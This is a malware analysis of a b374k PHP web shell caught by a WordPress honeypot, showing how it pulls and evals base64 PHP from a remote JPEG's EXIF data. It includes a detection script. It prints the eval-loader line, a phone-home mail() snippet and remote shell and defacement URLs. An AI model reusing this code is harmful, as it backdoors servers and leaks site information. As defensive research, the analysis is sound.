Crouching JPEG, Hidden PH2
b374k shell 3.2.3 - 2018-03-02
An instance of b374k web shell, with a strange code retrieval from EXIF data in a JPG image from googleusercontent.com
Is this the original b374k shell?
Another analysis of this particular piece of malware.
Downloaded as a plain file ("application/octet-stream") named b374k_3.2.3.php
using the "Upload" tab of WordPress' plugin installer.
Bad luck, this was part of a WordPress honey pot,
so no plugins got installed.
120.188.36.204 has domain name 120-188-36-204.resources.indosat.com
120-188-36-204.resources.indosat.com has no DNS name.
inetnum: 120.188.36.0 - 120.188.36.255
netname: GGSN-3G-ISAT-ID
descr: GGSN 3G
descr: INDOSAT's 3g Broadband Customer
descr: Jakarta
country: ID
admin-c: IH151-AP
tech-c: IH151-AP
remarks: For abuse and spam report please contact abuse@indosat.com
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-ID-INDOSAT-INP
last-modified: 2009-06-10T02:12:04Z
source: APNIC
person: INDOSAT INP Hostmaster
nic-hdl: IH151-AP
e-mail: hostmaster@indosatooredoo.com
address: PT Indosat
address: Jl. Medan Merdeka Barat 21
address: Jakarta Pusat
phone: +62-21-30072088
+62-8557897897
fax-no: +62-21-30001073
country: ID
mnt-by: MAINT-ID-INDOSAT-INP
last-modified: 2015-11-30T04:59:02Z
source: APNIC
traceroute to 120.188.36.204 (120.188.36.204), 30 hops max, 60 byte packets
1 129-45-246-162.versonetworks.net (162.246.45.129) 28.207 ms 28.412 ms 28.374 ms
2 10.100.100.1 (10.100.100.1) 28.382 ms 28.351 ms 28.318 ms
3 v231.core1.den1.he.net (216.66.73.25) 28.320 ms 28.288 ms 28.274 ms
4 100ge3-2.core1.sjc2.he.net (184.105.64.69) 62.876 ms 62.874 ms 62.841 ms
5 10ge4-5.core1.pao1.he.net (72.52.92.69) 62.829 ms 100ge1-1.core1.pao1.he.net (72.52.92.158) 62.817 ms 62.799 ms
6 eqix-sv8-ptindosat.com (198.32.176.167) 62.762 ms 64.298 ms 49.137 ms
7 114-0-78-103.resources.indosat.com (114.0.78.103) 214.498 ms 214.476 ms 214.407 ms
8 114-0-78-37.resources.indosat.com (114.0.78.37) 214.435 ms 214.416 ms 214.371 ms
9 114-0-78-205.resources.indosat.com (114.0.78.205) 224.314 ms 224.299 ms 224.264 ms
10 114-4-19-102.resources.indosat.com (114.4.19.102) 224.222 ms 224.167 ms 224.158 ms
11 * * *
12 114-0-51-24.resources.indosat.com (114.0.51.24) 230.087 ms 232.118 ms 232.067 ms
13 * * *
...
30 * * *
Downloaded file b374k_3.2.3.php
is not obfuscated in any form.
It's just PHP source.
It does have code that should make any reader suspicious:
$BASED = exif_read_data("https://lh3.googleusercontent.com/-svRm4i5Bs90/VsFaosQPKUI/AAAAAAAABew/03oHWkCEsN8/w140-h140-p/pacman.jpg");
eval(base64_decode($BASED["COMPUTED"]["UserComment"]));
PHP program exif_reader
retrieves that URL: php exif_reader > exif_data
I did also download the JPG file from which that data derives. It's right here:
The UserComment
element of the EXIF data does have a 2800 byte string in it.
Invoking php usercomment.php > usercomment.out
lets us see what that string
has encoded, which is a small decoder.
Invoking php uc2.php > uc3.php
gives us another layer of obfuscation.
Invoking php uc3.php > uc4.php
gives us what's probably the original PHP code.
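A defender-side check for the trick just described: walk a JPEG's APP1/Exif segment, pull out the UserComment tag and flag base64-wrapped PHP without ever evaluating it. This is an added example, not the author's exif_reader or usercomment.php scripts; the JPEG builder constructs a stand-in sample with the same layout (8-byte charset prefix, then base64), not pacman.jpg.

```python
import base64
import re
import struct
USER_COMMENT, EXIF_IFD_POINTER = 0x9286, 0x8769  # EXIF tag numbers
PHP_MARKERS = re.compile(rb"<\?php|\beval\s*\(|base64_decode\s*\(|\$_GET\b|\$_POST\b")

def exif_user_comment(jpeg: bytes):
    """Return the UserComment bytes from the APP1 Exif segment, or None if absent."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF and jpeg[pos + 1] != 0xDA:  # stop at SOS
        marker, seg_len = jpeg[pos + 1], struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + seg_len]  # segment body (length field counts itself)
        if marker == 0xE1 and seg.startswith(b"Exif\x00\x00"):
            return _find_user_comment(seg[6:])
        pos += 2 + seg_len
    return None

def _find_user_comment(tiff: bytes):
    end = {b"II": "<", b"MM": ">"}[tiff[:2]]  # TIFF byte order
    ifds = [struct.unpack(end + "I", tiff[4:8])[0]]  # IFD0; the Exif sub-IFD is queued from it
    while ifds:
        off = ifds.pop()
        (count,) = struct.unpack(end + "H", tiff[off:off + 2])
        for i in range(count):
            tag, _typ, n, val = struct.unpack(end + "HHI4s", tiff[off + 2 + 12 * i:][:12])
            if tag == EXIF_IFD_POINTER:
                ifds.append(struct.unpack(end + "I", val)[0])
            elif tag == USER_COMMENT:  # value is inline when <= 4 bytes, otherwise at an offset
                data = val if n <= 4 else tiff[struct.unpack(end + "I", val)[0]:][:n]
                return data[8:]  # drop the 8-byte character-code prefix, e.g. "ASCII\0\0\0"
    return None

def suspicious_user_comment(jpeg: bytes):
    """PHP markers found in the comment (base64-decoded when it is valid base64); [] if none."""
    comment = exif_user_comment(jpeg) or b""
    try:
        decoded = base64.b64decode(comment.strip(), validate=True)
    except ValueError:  # not base64: inspect the raw comment instead
        decoded = comment
    return sorted({m.decode() for m in PHP_MARKERS.findall(decoded)})

def build_jpeg_with_comment(php: bytes) -> bytes:
    """Constructed sample (not pacman.jpg): minimal JPEG whose UserComment holds base64(php)."""
    payload = b"ASCII\x00\x00\x00" + base64.b64encode(php)  # 8-byte charset prefix + comment
    ifd0 = struct.pack("<HHHII", 1, EXIF_IFD_POINTER, 4, 1, 26) + b"\0\0\0\0"  # Exif IFD at 26
    exif = struct.pack("<HHHII", 1, USER_COMMENT, 7, len(payload), 44) + b"\0\0\0\0"  # data at 44
    tiff = b"II*\x00" + struct.pack("<I", 8) + ifd0 + exif + payload  # little-endian, IFD0 at 8
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(tiff) + 8) + b"Exif\x00\x00" + tiff + b"\xff\xd9"
```

Running suspicious_user_comment over everything in an uploads directory is a cheap way to catch this style of stash; a hit means the image should be quarantined and the PHP that reads it hunted down.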
The PHP code in pacman.jpg
appears to execute every time b374k.php
get accessed.
The first time this hidden PHP code executes it does a phone-home:
$to = "syedich@yahoo.com";
$subject = $_SERVER['SERVER_NAME'];
$header = "From: Mastah <jancok@matamucok.com>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'];
mail($to, $subject, $message, $header);
$m = fopen(".db", "w") or die (" ");
$txt = "";
fwrite($m, $txt);
fclose($m);
Creating a file named .db
is how the hidden code avoids phoning home more than once.
The hidden code appears to be a small, crude web shell that only does things
if certain HTTP GET parameters are set.
The hidden code can upload a file to the infected WordPress site if "0upload" is set.
The hidden code can download two files: https://sites.google.com/site/bhshll123/bh.txt
if HTTP GET parameter "0shell" is set,
and http://pastebin.com/raw/6JA72K8m
if HTTP GET parameter "0deface" is set.
Those parameter names suggest mischief! I also think the hidden code will execute
before the b374k code does. You have to know about the hidden code -
it's a layer of obscurity on top of the covert b374k shell download.
bh.txt
contains some CSS and HTML that look like legitimate Google code.
I'm not sure what's going on with it:
it's totally convoluted,
and I'm not a JavaScript expert.
The pastebin URL gives me a 404 - not found.
The domain name "matamucok.com" does not appear in DNS or in whois information.
As a "from" address I suppose lack of an IP address doesn't matter.
"jancok@matamucok.com" doesn't show up in google as such,
but apparently that's an Indonesian name.
"syedich@yahoo.com" does appear in google,
mostly in people mad about this particular web shell.